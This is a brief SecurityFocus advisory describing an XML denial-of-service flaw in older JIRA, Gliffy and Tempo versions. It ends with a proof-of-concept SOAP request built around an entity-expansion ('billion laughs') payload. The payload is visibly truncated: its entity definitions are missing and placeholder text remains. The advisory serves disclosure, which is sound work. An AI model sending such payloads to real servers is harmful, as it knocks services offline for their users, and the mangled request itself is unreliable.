source: https://www.securityfocus.com/bid/53595/info JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data. Exploiting this issue allows remote attackers to cause denial-of-service conditions in the context of an affected application. The following versions are affected: Versions prior to JIRA 5.0.1 are vulnerable. Versions prior to Gliffy 3.7.1 are vulnerable. Versions prior to Tempo versions 6.4.3.1, 6.5.1, and 7.0.3 are vulnerable. POST somehost.com HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "" User-Agent: Jakarta Commons-HttpClient/3.1 Host: somehost.com Content-Length: 1577 ]> stuff1 ?&lol9; stuff3 stuff4 stuff5